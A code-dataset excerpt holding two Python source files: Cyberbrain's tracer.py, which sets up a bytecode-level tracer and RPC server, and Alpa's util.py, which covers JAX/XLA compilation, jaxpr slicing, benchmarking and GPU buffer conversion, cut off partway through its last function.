source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
tracer.py
|
"""Cyberbrain public API and tracer setup."""
import argparse
import dis
import functools
import os
import sys
from types import MethodType, FunctionType, FrameType
from typing import Optional, Union
from get_port import get_port
from . import logger, utils, rpc_server
from .frame import Frame
from .frame_tree import FrameTree
_debug_mode = False
# This is to allow using debug mode in both test and non-test code.
# Flag will conflict, so only execute it if not running a test.
if not utils.run_in_test():
parser = argparse.ArgumentParser()
parser.add_argument(
"--debug_mode",
dest="debug_mode",
action="store_true",
help="Whether to log more stuff for debugging.",
)
parser.set_defaults(debug_mode=False)
cb_args, _ = parser.parse_known_args()
_debug_mode = cb_args.debug_mode
class TracerFSM:
# States
INITIAL = 0
ACTIVE = 1
CALLED = 2
# Operations
START = 3
STOP = 4
mapping = {(INITIAL, START): ACTIVE, (ACTIVE, STOP): CALLED}
@classmethod
def next_state(cls, current_state, operation):
return cls.mapping[(current_state, operation)]
class Tracer:
debug_mode = _debug_mode
def __init__(self, debug_mode=None):
self.frame = None
self.raw_frame = None
self.decorated_function_code_id = None
self.frame_logger: Optional[logger.FrameLogger] = None
if debug_mode is not None:
self.debug_mode = debug_mode
self.tracer_state = TracerFSM.INITIAL
# For now server is put inside Tracer. Later when we need to trace multiple
# frames it should be moved to somewhere else.
self.server = rpc_server.Server()
if utils.run_in_test():
# Picks a random port for testing to allow concurrent test execution.
self.server.serve(port=get_port())
else:
self.server.serve()
def _initialize_frame_and_logger(
self, raw_frame: FrameType, initial_instr_pointer: int
):
self.tracer_state = TracerFSM.next_state(self.tracer_state, TracerFSM.START)
frame_name = (
# Use filename as frame name if code is run at module level.
os.path.basename(raw_frame.f_code.co_filename).rstrip(".py")
if raw_frame.f_code.co_name == "<module>"
else raw_frame.f_code.co_name
)
self.frame = Frame(
# For testing, only stores the basename so it's separator agnostic.
filename=utils.shorten_path(
raw_frame.f_code.co_filename, 1 if utils.run_in_test() else 3
),
frame_name=frame_name,
offset_to_lineno=utils.map_bytecode_offset_to_lineno(raw_frame),
)
FrameTree.add_frame(self.frame.frame_id, self.frame)
self.frame_logger = logger.FrameLogger(
instructions={
instr.offset: instr for instr in dis.get_instructions(raw_frame.f_code)
},
initial_instr_pointer=initial_instr_pointer,
frame=self.frame,
debug_mode=self.debug_mode,
)
def start(self, *, disabled=False):
"""Initializes tracing."""
# For now, we only allow triggering tracing once. This might change in the
# future.
if disabled or self.tracer_state != TracerFSM.INITIAL:
return
self.raw_frame = sys._getframe(1)
# tracer.init() contains the following instructions:
# 0 LOAD_FAST 0 (tracer)
# 2 LOAD_METHOD 0 (init)
# 4 CALL_METHOD 0
# 6 POP_TOP
# However logger is initialized before executing CALL_METHOD, last_i is already
# at 4. This will make value stack don't have enough elements. So we need to
# move the instr_pointer back to LOAD_FAST, and make sure LOAD_FAST and
# LOAD_METHOD are scanned, so that value stack can be in correct state.
self._initialize_frame_and_logger(
self.raw_frame, initial_instr_pointer=self.raw_frame.f_lasti - 4
)
self.raw_frame.f_trace_opcodes = True
self.raw_frame.f_trace = self.local_tracer
sys.settrace(self.global_tracer)
def stop(self):
if not self.frame_logger or self.tracer_state == TracerFSM.CALLED:
# No frame_logger means start() did not run.
return
self.tracer_state = TracerFSM.next_state(self.tracer_state, TracerFSM.STOP)
sys.settrace(None)
# self.global_frame is set means tracer.start() was called explicitly.
# Otherwise the @trace decorator is used.
if self.raw_frame:
self.raw_frame.f_trace = None
del self.raw_frame
# Checks the value stack is in correct state: no extra elements left on
# stack.These two are tracers replaced with placeholders.
assert self.frame_logger.frame.value_stack.stack == [[], []]
else:
assert len(self.frame_logger.frame.value_stack.stack) == 0
# If run in production, let the server wait for termination.
if not utils.run_in_test():
self._wait_for_termination()
def _wait_for_termination(self):
"""
RPC server should keep running until explicitly terminated, but it should not
block the execution of user code. Thus we let it wait in a separate thread.
"""
from threading import Thread
Thread(target=self.server.wait_for_termination).start()
def __call__(self, disabled: Union[Union[FunctionType, MethodType], bool] = False):
"""Enables the tracer object to be used as a decorator.
Note that the decorator can take a `disabled` argument, or no argument:
@tracer(disabled=True)
def f():
or
@tracer
def f():
To achieve this, the `disabled` parameter can either be a boolean, or the
decorated function. To match the semantics, a better name for the parameter is
"function_or_disabled", but users being able to write `disabled=True` is a
must-have feature, therefore we have no choice but to name it "disabled".
This is ugly and I hope to find a way to change it. singledispatch[method] won't
work, because it does not take keyword arguments. TypeDispatch from fastcore
(https://fastcore.fast.ai/dispatch.html) is similar to singledispatch, but it's
not ideal either as it requires putting method implementation outside of class.
"""
def decorator(f, disabled_by_user=False):
@functools.wraps(f)
def wrapper(*args, **kwargs):
# TracerFSM.ACTIVE: appeared in recursive call. The tracer has been
# activated in the outer call frame.
# TracerFSM.CALLED: call the function multiple times.
# In both cases, don't enable tracing.
if disabled_by_user or self.tracer_state in {
TracerFSM.ACTIVE,
TracerFSM.CALLED,
}:
return f(*args, **kwargs)
self.decorated_function_code_id = id(f.__code__)
sys.settrace(self.global_tracer)
result = f(*args, **kwargs)
self.stop()
return result
return wrapper
if type(disabled) == bool:
return functools.partial(decorator, disabled_by_user=disabled)
else:
decorated_function = disabled
return decorator(decorated_function)
@property
def events(self):
return self.frame_logger.frame.events
@property
def loops(self):
"""Test only. Provides access to logged events."""
return list(self.frame_logger.frame.loops.values())
def global_tracer(self, raw_frame, event, arg):
# Later when we need to trace more functions, we should identify those
# functions or at least use utils.should_exclude(frame) to avoid tracing
# unnecessary frames.
#
# self.tracer_state == TracerFSM.INITIAL is for preventing stepping into
# recursive calls, since their f_code are the same.
if (
event == "call"
and id(raw_frame.f_code) == self.decorated_function_code_id
and self.tracer_state == TracerFSM.INITIAL
):
raw_frame.f_trace_opcodes = True
self._initialize_frame_and_logger(raw_frame, initial_instr_pointer=0)
return self.local_tracer
def local_tracer(self, raw_frame, event, arg):
if utils.should_exclude(raw_frame):
return
if event == "opcode":
self.frame_logger.update(raw_frame)
if event == "return":
# print(raw_frame, event, arg, raw_frame.f_lasti)
self.frame.log_return_event(raw_frame, value=arg)
|
util.py
|
# pylint: disable=consider-using-enumerate
"""Common utilities."""
import functools
import itertools as it
import os
import subprocess
import time
from collections import OrderedDict
from datetime import datetime
from functools import partial, partialmethod
import threading
from typing import Sequence, Any
from warnings import warn
import jax
import jax.numpy as jnp
from jax._src import dispatch
from jax._src.api import FLAGS, ShapeDtypeStruct
from jax._src.dlpack import from_dlpack, to_dlpack
from jax._src.lib import xla_bridge as xb, xla_client as xc, xla_extension as xe
from jax.api_util import shaped_abstractify
from jax.core import (Atom, ClosedJaxpr, DropVar, Jaxpr, JaxprEqn, Literal,
ShapedArray, Var)
from jax.experimental.maps import FrozenDict
from jax.interpreters import partial_eval as pe
from jax.interpreters import xla, pxla
from jax.interpreters.xla import _DeviceArray
from jax.tree_util import tree_map, tree_flatten, PyTreeDef
import numpy as np
import flax
from flax.training import train_state
import ray
import tqdm
import cupy as cp
from alpa.global_env import global_config, is_worker
########################################
##### Alpa API Utilities
########################################
def freeze_dict(pytree: PyTreeDef):
"""Convert a pytree to a FrozenDict."""
def is_leaf(x):
return isinstance(x, dict)
def freeze(x):
if isinstance(x, dict):
return FrozenDict(x)
return x
return tree_map(freeze, pytree, is_leaf)
def auto_static_argnums(args: Sequence[Any]):
"""Return the indices of static arguments according to heuristic rules."""
def is_static_arg(arg):
if isinstance(arg, (bool, int, float, str)):
return True
if isinstance(arg, (flax.optim.base.Optimizer, train_state.TrainState)):
return False
xs, _ = tree_flatten(arg)
for x in xs:
try:
x = shaped_abstractify(x)
except TypeError:
return True
return False
return tuple(i for i in range(len(args)) if is_static_arg(args[i]))
def auto_donate_argnums(args: Sequence[Any]):
"""Return the indices of donated arguments according to heuristic rules."""
def should_donate(x):
# Always donate optimizer
if isinstance(x, (flax.optim.base.Optimizer, train_state.TrainState)):
return True
return False
return tuple(i for i in range(len(args)) if should_donate(args[i]))
def abstractify_with_aval(x):
if isinstance(x, ShapedArray):
return x
elif isinstance(x, ShapeDtypeStruct):
return ShapedArray(x.shape, x.dtype, named_shape=x.named_shape)
else:
return xla.abstractify(x)
def tree_to_nparray(tree):
"""Convert a pytree to a pytree of numpy array."""
def convert_to_nparray(x):
if hasattr(x, "__array__"):
return np.asanyarray(x)
return x
return tree_map(convert_to_nparray, tree)
def update_jax_platform(platform):
"""Update the jax backend platform."""
jax.config.update("jax_platform_name", platform)
xb.get_backend.cache_clear()
########################################
##### Data Structure Utilities
########################################
def to_int_tuple(array: np.ndarray):
"""Convert a numpy array to int tuple."""
if array is None:
return tuple()
return tuple(int(x) for x in array)
def check_arithmetic_sequence(array: np.ndarray):
"""Check the input 1-D array is an arithmetic sequence. Return
the delta if Ture and None otherwise."""
if len(array) < 2:
return None
delta = array[1] - array[0]
for i in range(2, len(array)):
if array[i] - array[i - 1] != delta:
return None
return delta
class OrderedSet:
"""An ordered set implemented by using the built-in OrderedDict."""
def __init__(self, iterable=()):
self.dict = OrderedDict()
for element in iterable:
self.dict[element] = None
def add(self, *args):
for x in args:
self.dict[x] = None
def update(self, other):
for x in other:
self.dict[x] = None
def union(self, other):
result = OrderedSet()
result.update(self)
result.update(other)
return result
def intersection_update(self, other):
to_be_removed = []
for x in self:
if x not in other:
to_be_removed.append(x)
for x in to_be_removed:
self.remove(x)
def intersection(self, other):
result = OrderedSet()
for x in self:
if x in other:
result.add(x)
return result
def discard(self, element):
if element in self:
del self.dict[element]
def remove(self, element):
if element not in self:
raise KeyError(element)
del self.dict[element]
def clear(self):
self.dict.clear()
def difference(self, other):
result = OrderedSet()
for x in self:
if x not in other:
result.add(x)
return result
def difference_update(self, other):
for x in other:
self.discard(x)
def symmetric_difference(self, other):
result = OrderedSet()
for x in self:
if x not in other:
result.add(x)
for x in other:
if x not in self:
result.add(x)
return result
def __iter__(self):
for x in self.dict:
yield x
def __len__(self):
return len(self.dict)
def __contains__(self, element):
return element in self.dict
def __repr__(self):
return "OrderedSet([" + ", ".join(repr(x) for x in self) + "])"
def __or__(self, other):
return self.union(other)
def __and__(self, other):
return self.intersection(other)
def __sub__(self, other):
return self.difference(other)
def __xor__(self, other):
return self.symmetric_difference(other)
def __ior__(self, other):
self.update(other)
def __iand__(self, other):
self.intersection_update(other)
def __isub__(self, other):
self.difference_update(other)
def __eq__(self, other):
if isinstance(other, OrderedSet):
return self.dict == other.dict
return False
@classmethod
def __class_getitem__(cls, item):
return f"{cls.__name__}[{item.__name__}]"
class DisjointDict:
"""A dictionary for recursive lookup.
Path compression is used to avoid excess of maximum recursion depth."""
def __init__(self):
self.values = {}
def update(self, keys, values):
for key, value in zip(keys, values):
self.values[key] = value
def recursive_lookup(self, key):
lookup_queue = [key]
value = None
while len(lookup_queue) > 0:
k = lookup_queue.pop()
if value is not None:
self.values[k] = value
continue
if k not in self.values:
value = k
continue
lookup_queue.append(k)
lookup_queue.append(self.values[k])
return value
def keys(self):
return list(self.values.keys())
def cached_property(fn, *args, **kwargs):
"""
Decorator to make a function a "cached property".
This means that it is a property whose return value is cached after the
first time it is called.
Args:
fn: The function to be made a cached property
*args: Any args for the function
**kwargs: Any kwargs for the function
Returns:
function
"""
return property(functools.lru_cache()(fn, *args, **kwargs))
########################################
##### XLA API Utilities
########################################
def get_compile_options(num_replicas: int, num_partitions: int,
device_assignment: np.ndarray,
use_spmd_partitioning: bool,
parameter_is_tupled_arguments: int,
build_random_seed: int):
"""Return CompileOptions for XLA compilation."""
compile_options = xb.get_compile_options(
num_replicas=num_replicas,
num_partitions=num_partitions,
device_assignment=device_assignment,
use_spmd_partitioning=use_spmd_partitioning,
)
compile_options.parameter_is_tupled_arguments = parameter_is_tupled_arguments
compile_options.executable_build_options.seed = build_random_seed
return compile_options
def jaxpr_to_hlo_computation(name: str, closed_jaxpr: ClosedJaxpr,
donated_invars: Sequence[bool], backend):
"""Convert a jaxpr to a XLA HLO computation.
Reference code: jax/jax/_src/dispatch.py::lower_xla_callable
"""
backend_name = backend.platform
in_avals = [var.aval for var in closed_jaxpr.jaxpr.invars]
consts = closed_jaxpr.consts
map(dispatch.prefetch,
it.chain(consts, dispatch.jaxpr_literals(closed_jaxpr.jaxpr)))
# Convert jaxpr to XLA HLO
tuple_args = False
axis_env = xla.AxisEnv(nreps=1, names=(), sizes=())
name_stack = xla.new_name_stack(xla.wrap_name(name, 'parallelize'))
c = xc.XlaBuilder(name)
xla_consts = xla._xla_consts(c, consts)
xla_args, donated_invars = xla._xla_callable_args(
c, in_avals, tuple_args, donated_invars=donated_invars)
ctx = xla.TranslationContext(c, backend_name, axis_env, name_stack)
out_nodes = xla.jaxpr_subcomp(ctx, closed_jaxpr.jaxpr, xla_consts,
*xla_args)
out_tuple = xc.ops.Tuple(c, out_nodes)
# Set up aliases (donating invars)
if donated_invars:
if backend.platform in ("gpu", "tpu"):
donation_results = xla.set_up_aliases(c, xla_args,
c.GetShape(out_tuple),
donated_invars, tuple_args)
if any(donation_results):
unused_donations = [
str(c.GetShape(a))
for a, d in zip(xla_args, donation_results)
if d
]
warn_msg = ", ".join(unused_donations)
warn(f"Some donated buffers were not usable: {warn_msg}")
return c.build(out_tuple)
def setup_computation_alias(xla_computation: xc.XlaComputation,
donated_invars: Sequence[bool]):
"""Set input/output alias in xla computation.
Assume the tensors in output tuple strictly match the donated parameters.
"""
program_shape = xla_computation.program_shape()
parameter_shapes = program_shape.parameter_shapes()
result_shapes = program_shape.result_shape().tuple_shapes()
assert len(parameter_shapes) == len(donated_invars), (
"Zhuohan: This error might be caused by an error in "
"XLA stage slicing.")
p_in = 0
p_out = 0
while p_in < len(parameter_shapes) and p_out < len(result_shapes):
if donated_invars[p_in]:
if parameter_shapes[p_in] == result_shapes[p_out]:
xla_computation.setup_alias((p_out,), p_in, ())
p_in += 1
p_out += 1
else:
p_out += 1
else:
p_in += 1
while p_in < len(parameter_shapes):
if donated_invars[p_in]:
warn("Some vars are not donated")
p_in += 1
def count_communication_primitives(hlo_ir: str,
ignore_scalar_all_reduce: bool = False):
"""Count the communication primitives in a HLO IR."""
total = hlo_ir.count("channel_id")
all_reduce = hlo_ir.count("all-reduce(") + hlo_ir.count("all-reduce-start(")
all_gather = hlo_ir.count("all-gather(") + hlo_ir.count("all-gather-start(")
reduce_scatter = hlo_ir.count("reduce-scatter(") + hlo_ir.count(
"reduce-scatter-start(")
all_to_all = hlo_ir.count("all-to-all(") + hlo_ir.count("all-to-all-start(")
if ignore_scalar_all_reduce:
# Ignore allreduce of scalar values
scalar_all_reduce = 0
scalar_all_reduce += hlo_ir.count("all-reduce(f32[]")
scalar_all_reduce += hlo_ir.count("all-reduce-start(f32[]")
scalar_all_reduce += hlo_ir.count("all-reduce(f16[]")
scalar_all_reduce += hlo_ir.count("all-reduce-start(f16[]")
total -= scalar_all_reduce
all_reduce -= scalar_all_reduce
return total, all_reduce, all_gather, reduce_scatter, all_to_all
def compile_dummy_zero_constant(backend, num_devices: int):
"""Compile an XLA executable that returns a constant zero."""
c = xc.XlaBuilder("dummy_zero_constant")
sharding = xc.OpSharding()
sharding.type = sharding.type.REPLICATED
c.set_sharding(sharding)
zero = xc.ops.Constant(c, np.array(0, dtype=np.dtype(np.int32)))
c.clear_sharding()
c = c.build(xc.ops.Tuple(c, [zero]))
compile_options = xb.get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
)
compiled = backend.compile(c, compile_options)
return compiled
def compile_allocate_zero_buffers(backend, num_devices: int,
shapes: Sequence[Sequence[int]],
dtypes: Sequence[jnp.dtype]):
"""Compile an XLA executable that returns zero buffers with given shape and dtypes."""
c = xc.XlaBuilder("allocate_zero_buffers")
sharding = xc.OpSharding()
sharding.type = sharding.type.REPLICATED
c.set_sharding(sharding)
ret = []
for shape, dtype in zip(shapes, dtypes):
zero = xc.ops.Constant(c, np.array(0, dtype=dtype))
zero = xc.ops.Broadcast(zero, shape)
ret.append(zero)
c.clear_sharding()
c = c.build(xc.ops.Tuple(c, ret))
compile_options = xb.get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
)
compiled = backend.compile(c, compile_options)
return compiled
def compile_memset_zero_buffers(backend, num_devices: int,
shapes: Sequence[Sequence[int]],
dtypes: Sequence[jnp.dtype]):
"""
Compile an XLA executable that memset zero buffers with given shape and dtypes.
Try to avoid memcpy
"""
c = xc.XlaBuilder("allocate_zero_buffers")
args = []
sharding = xc.OpSharding()
sharding.type = sharding.type.REPLICATED
c.set_sharding(sharding)
for shape, dtype in zip(shapes, dtypes):
args.append(
xc.ops.Parameter(c, len(args),
xc.shape_from_pyval(np.ones(shape, dtype))))
sharding_tuple = xc.OpSharding()
sharding_tuple.type = sharding.type.TUPLE
sharding_tuple.tuple_shardings = [sharding for _ in shapes]
c.set_sharding(sharding_tuple)
input_params = xc.ops.Tuple(c, args)
c.set_sharding(sharding)
output_shape = xc.Shape.scalar_shape(np.dtype(np.float32))
output_tuple = xc.ops.CustomCall(c,
b'__builtin$MemZero',
operands=(input_params,),
shape=output_shape)
c = c.build(output_tuple)
compile_options = xb.get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
)
compiled = backend.compile(c, compile_options)
return compiled
def compile_concatenate(backend, mesh_shape, sharding_spec, batch_size,
batch_dim, aval):
num_devices = np.prod(mesh_shape)
sharding = pxla.sharding_spec_sharding_proto(sharding_spec)
build_random_seed = global_config.build_random_seed
compile_options = get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
parameter_is_tupled_arguments=False,
build_random_seed=build_random_seed)
c = xc.XlaBuilder("concatenate buffers")
c.set_sharding(sharding)
operands = []
for batch_idx in range(batch_size):
operands.append(
xc.ops.Parameter(
c, batch_idx,
xc.shape_from_pyval(np.ones(aval.shape, aval.dtype))))
concated = xc.ops.ConcatInDim(c, operands, batch_dim)
c = c.build(concated)
compiled = backend.compile(c, compile_options)
hlo_proto = compiled.hlo_modules()[0].as_serialized_hlo_module_proto()
return hlo_proto
def get_shard_shape(aval: ShapedArray, sharding_spec: pxla.ShardingSpec):
"""Return the shape of a shard."""
shape = []
for dim, spec_dim in zip(aval.shape, sharding_spec.sharding):
if isinstance(spec_dim, pxla.NoSharding):
shape.append(dim)
elif isinstance(spec_dim, pxla.Chunked):
shape.append(dim // np.prod(spec_dim.chunks))
elif isinstance(spec_dim, pxla.Unstacked):
shape.append(spec_dim.size)
return tuple(shape)
def get_microbatch_sharding_spec(spec: pxla.ShardingSpec, batch_dim,
num_micro_batch):
batch_dim_chunks = [num_micro_batch]
if isinstance(spec.sharding[batch_dim], pxla.Chunked):
batch_dim_chunks.extend(spec.sharding[batch_dim].chunks)
batch_dim_axis = 0
for sharding in spec.sharding[:batch_dim]:
if isinstance(sharding, pxla.Chunked):
batch_dim_axis += 1
new_sharding = list(spec.sharding)
new_sharding[batch_dim] = pxla.Chunked(batch_dim_chunks)
new_mapping = []
for mapping in spec.mesh_mapping:
if isinstance(mapping, pxla.Replicated):
new_mapping.append(mapping)
continue
assert isinstance(mapping, pxla.ShardedAxis)
new_axis = mapping.axis
if mapping.axis >= batch_dim_axis:
new_axis += 1
new_mapping.append(pxla.ShardedAxis(new_axis))
new_mapping.append(pxla.ShardedAxis(batch_dim_axis))
return pxla.ShardingSpec(sharding=tuple(new_sharding),
mesh_mapping=tuple(new_mapping))
class XlaPassContext:
"""A global context for passing arguments from python to XLA c++ passes."""
current = None
def __init__(self, value_dict):
self.value_dict = value_dict
def __enter__(self):
assert XlaPassContext.current is None, "Do not support recurrent context"
XlaPassContext.current = self
xe.set_pass_context(self.value_dict)
def __exit__(self, exc_type, exc_value, exc_traceback):
XlaPassContext.current = None
xe.clear_pass_context()
########################################
##### Jaxpr Utilities
########################################
def clone_jaxpr(closed_jaxpr: ClosedJaxpr,
invars: Sequence[Atom] = None,
outvars: Sequence[Var] = None,
eqns: Sequence[JaxprEqn] = None,
constvars: Sequence[Var] = None,
consts: Sequence = None):
"""Clone a jaxpr and replace members if they are provided."""
constvars = constvars or closed_jaxpr.jaxpr.constvars
invars = invars or closed_jaxpr.jaxpr.invars
outvars = outvars or closed_jaxpr.jaxpr.outvars
eqns = eqns or closed_jaxpr.jaxpr.eqns
consts = consts or closed_jaxpr.consts
jaxpr = Jaxpr(constvars, invars, outvars, eqns)
return ClosedJaxpr(jaxpr, consts)
def trace_jaxpr_with_micro_batch(fun, batch_invars, num_micro_batches,
raw_avals):
"""Trace the jaxpr of the computation of a micro batch."""
avals = []
batch_size = None
for aval, is_batch_var in zip(raw_avals, batch_invars):
if is_batch_var:
assert aval.shape[0] % num_micro_batches == 0, (
"The batch dimension must be divisable by num_micro_batches.")
if batch_size is None:
batch_size = aval.shape[0] // num_micro_batches
else:
assert batch_size == aval.shape[0] // num_micro_batches, (
"The batch dimension must be the same for all batch vars.")
shape = (batch_size,) + aval.shape[1:]
avals.append(aval.update(shape=shape))
else:
avals.append(aval)
with jax.disable_jit():
jaxpr, _, consts = pe.trace_to_jaxpr_final(fun, avals)
closed_jaxpr = ClosedJaxpr(jaxpr, consts)
return closed_jaxpr, avals, batch_size
def slices_to_jaxpr(closed_jaxpr: ClosedJaxpr,
sliced_eqns) -> Sequence[ClosedJaxpr]:
"""Wrap sliced equations to a list of ClosedJaxpr."""
n_eqns = len(sliced_eqns)
global_invars = OrderedSet(closed_jaxpr.jaxpr.invars)
global_consts = dict(zip(closed_jaxpr.jaxpr.constvars, closed_jaxpr.consts))
global_outvars = OrderedSet(
var for var in closed_jaxpr.jaxpr.outvars if isinstance(var, Var))
result = []
layer_invars = [OrderedSet() for _ in range(n_eqns)]
layer_outvars = [OrderedSet() for _ in range(n_eqns)]
layer_consts = [{} for _ in range(n_eqns)]
var_layer_dict = {}
for i, eqns in enumerate(sliced_eqns):
for eqn in eqns:
for var in eqn.invars:
if isinstance(var, Literal):
continue
if var in global_consts:
layer_consts[i][var] = global_consts[var]
elif var in global_invars:
layer_invars[i].add(var)
elif var_layer_dict[var] != i:
layer_invars[i].add(var)
layer_outvars[var_layer_dict[var]].add(var)
else:
assert var_layer_dict[var] == i
for var in eqn.outvars:
if not isinstance(var, DropVar):
var_layer_dict[var] = i
if var in global_outvars:
layer_outvars[i].add(var)
for i, eqns in enumerate(sliced_eqns):
new_jaxpr = Jaxpr(list(layer_consts[i].keys()), list(layer_invars[i]),
list(layer_outvars[i]), eqns)
new_closed_jaxpr = ClosedJaxpr(new_jaxpr,
list(layer_consts[i].values()))
result.append(new_closed_jaxpr)
return result
def log_jaxpr(jaxpr: ClosedJaxpr, filename: str):
"""Print jaxpr int a temporary file for debugging purposes."""
path = "/tmp/" + filename
with open(path, "w", encoding="utf-8") as f:
f.write(str(jaxpr))
########################################
##### Profiling Utilities
########################################
def profile_xla_executable(compiled, backend, local_devices):
"""Measure the time costs of a xla executable with dummy inputs."""
hlo_module = compiled.hlo_modules()[0]
cost_failed = [np.inf] * 3
# Allocate dummy buffers
input_shapes = hlo_module.parameter_shapes()
# prune OOM cases, not exact because third party lib not considered:
free_mem = local_devices[0].available_memory()
input_bytes = 0
for shape in input_shapes:
input_bytes += np.prod(
shape.dimensions()) * shape.numpy_dtype().itemsize
if free_mem < compiled.total_allocation_size() and free_mem != -1:
return cost_failed
device_inputs = []
try:
for shape in input_shapes:
device_inputs.append([
backend.buffer_from_pyval(
np.empty(shape.dimensions(), shape.numpy_dtype()), device)
for device in local_devices
])
local_devices[0].synchronize_all_activity()
except RuntimeError:
return cost_failed
# Run benchmark
def run_func():
device_outputs = compiled.execute_sharded_on_local_devices(
device_inputs)
# Reset the value for donate buffers
ct = 0
for j in range(len(device_inputs)):
if device_inputs[j][0].is_deleted():
device_inputs[j] = device_outputs[ct]
ct += 1
local_devices[0].synchronize_all_activity()
try:
costs = benchmark_func(run_func, repeat=3, number=3)
except RuntimeError:
costs = cost_failed
return costs
def benchmark_func(run_func,
sync_func=None,
warmup=1,
repeat=3,
number=5,
min_repeat_second=None):
"""
Benchmark the execution time of a function.
The function is executed for (warmup + number * repeat) times.
The return value is a list of `repeat` elements and each elements is
the average execution time of `number` executions.
If `min_repeat_second` is set, the function automatically picks a `number`
so that one `repeat` lasts for at least `min_repeat_second` seconds.
"""
costs = []
# Warmup
for _ in range(warmup):
run_func()
# Choose a "number" according to "min_repeat_second"
if min_repeat_second:
if sync_func:
sync_func()
tic = time.time()
run_func()
if sync_func:
sync_func()
toc = time.time()
cost = toc - tic
number = max(int(min_repeat_second / cost), 1)
# Benchmark
for _ in range(repeat):
if sync_func:
sync_func()
tic = time.time()
for __ in range(number):
run_func()
if sync_func:
sync_func()
costs.append(time.time() - tic)
return np.array(costs) / number
########################################
##### Array conversion
########################################
def is_continuous_subset(tensor_slice, tensor_shape, row_major=True):
"""
Figure out whether a slice is a continuous subset of the tensor.
Args:
slice_shape (Sequence(slice)): the shape of the slice.
tensor_shape (Sequence(int)): the shape of the tensor.
row_major (bool): whether the tensor layout is row-majored.
Returns:
is_continuous (bool)
"""
if not row_major:
raise NotImplementedError("Do not support column major.")
ndim = len(tensor_shape)
if len(tensor_slice) != ndim:
raise RuntimeError("ndims mismatch.")
slice_shape = tuple(ind.stop - ind.start for ind in tensor_slice)
for dim, dim_shape in enumerate(slice_shape):
if dim + 1 > ndim:
return True
if dim_shape == 1:
continue
return slice_shape[dim + 1:] == tensor_shape[dim + 1:]
def infer_offset_and_n_elements(tensor_slice):
"""Calculate the offset and #elements before making NCCL calls.
This function assumes the slice is a continuous subset of the original tensor.
"""
slice_shape = tuple(ind.stop - ind.start for ind in tensor_slice)
offset = tuple()
n_elements = np.prod(slice_shape)
for dim, dim_shape in enumerate(slice_shape):
offset = offset + (tensor_slice[dim].start,)
if dim_shape > 1:
break
return offset, n_elements
def xla_buffer_to_jax_tensor(xla_buf):
"""
Convert an xla buffer to a JAX DeviceArray.
So we can index over the data buffer.
"""
aval = ShapedArray(xla_buf.shape, xla_buf.dtype)
return _DeviceArray(aval, xla_buf.device(), xla_buf)
def jax_tensor_to_xla_buffer(jax_buf):
"""Convert a JAX Device array back to XLA buffer."""
return jax_buf.device_buffer
def xla_buffer_to_cupy(xla_buf, take_ownership=False):
"""Convert an xla buffer directly to cupy, w/o transitioning from jax buffer."""
return cp.fromDlpack(
xc._xla.buffer_to_dlpack_managed_tensor(xla_buf,
take_ownership=take_ownership))
def cupy_to_xla_buffer(tensor):
"""Convert cupy tensors to XLA buffers."""
if isinstance(tensor, list):
return list(map(cupy_to_xla_buffer, tensor))
cpu_backend = xb.get_backend("cpu")
try:
gpu_backend = xb.get_backend("gpu")
except RuntimeError:
gpu_backend = None
buf = xc._xla.dlpack_managed_tensor_to_buffer(tensor.toDlpack(),
cpu_backend, gpu_backend)
return buf
def jax_tensor_to_cupy(tensors, take_ownership=False):
"""Convert a Jax DeviceArray to cupy tensor; zero copy."""
if isinstance(tensors, list):
return list(map(jax_tensor_to_cupy, tensors))
return cp.fromDlpack(to_dlpack(tensors, take_ownership=take_ownership))
def cupy_to_jax_tensor(tensors):
"""Convert cupy tensors to JAX tensors."""
if isinstance(tensors, list):
return list(map(cupy_to_jax_tensor, tensors))
return from_dlpack(tensors.toDlpack())
# Note: use Python jit instead of CPP jit,
# because CPP jit has bugs on _DeviceArray.
if is_worker:
FLAGS.experimental_cpp_jit = False
# Note(Hao): this function will be jit-ed into as many versions as the possible length of start_indices
@partial(jax.jit, donate_argnums=0, static_argnums=2)
def jax_tensor_set(src_buf, update, start_indices):
"""
In-place write on a JAX buffer.
Args:
src_buf: JAX device array.
update: JAX device array.
start_indices (tuple[int]): tuple of integers indicating the starting indices.
"""
# src_buf = src_buf.at[indices].set(update)
src_buf = jax.lax.dynamic_update_slice(src_buf, update, start_indices)
return src_buf
@partial(jax.jit, static_argnums=(1, 2))
def jax_tensor_index(src_tensor, indices, size):
dst_tensor = jax.lax.dynamic_slice(src_tensor, indices, size)
return dst_tensor
########################################
##### OS / IO Utilities
########################################
def run_cmd(cmd: str):
"""Run a bash command."""
print(cmd)
ret = os.system(cmd)
return ret
def run_with_timeout(func, args=(), kwargs=None, timeout=None):
"""Run a function with timeout."""
ret_value = []
def _target_func():
ret_value.append(func(*args, **(kwargs or {})))
t = threading.Thread(target=_target_func)
t.start()
t.join(timeout=timeout)
if t.is_alive():
raise TimeoutError
if not ret_value:
raise RuntimeError
return ret_value[0]
def list_gpu_info():
"""List all gpu information by calling nvidia-sim."""
ret = subprocess.getoutput("nvidia-smi -L")
visible_devices = os.environ.get("CUDA_VISIBLE_DEVICES", None)
if visible_devices:
ids = [int(x) for x in visible_devices.split(",")]
lines = ret.split("\n")
lines = [lines[i] for i in ids]
ret = "\n".join(lines)
return ret
def disable_tqdm_globally():
"""Disable tqdm globally."""
tqdm.tqdm.__init__ = partialmethod(tqdm.tqdm.__init__, disable=True)
def get_num_hosts_and_num_devices(args):
"""Get the number of hosts and the number of devices per host for benchmark scripts."""
if args.num_hosts is not None or args.num_devices_per_host is not None:
assert args.num_hosts is not None and args.num_devices_per_host is not None
num_hosts, num_devices_per_host = args.num_hosts, args.num_devices_per_host
else:
if hasattr(args, "local") and args.local:
num_hosts = 1
num_devices_per_host = list_gpu_info().count("UUID")
else:
ray.init(address="auto", namespace=get_ray_namespace_str())
num_hosts = len(ray.nodes())
num_devices_per_host = int(
ray.cluster_resources()["GPU"]) // num_hosts
return num_hosts, num_devices_per_host
def get_ray_namespace_str(prefix=global_config.default_ray_namespace_prefix):
"""Get a unique ray namespace str to avoid some annoyed warnings."""
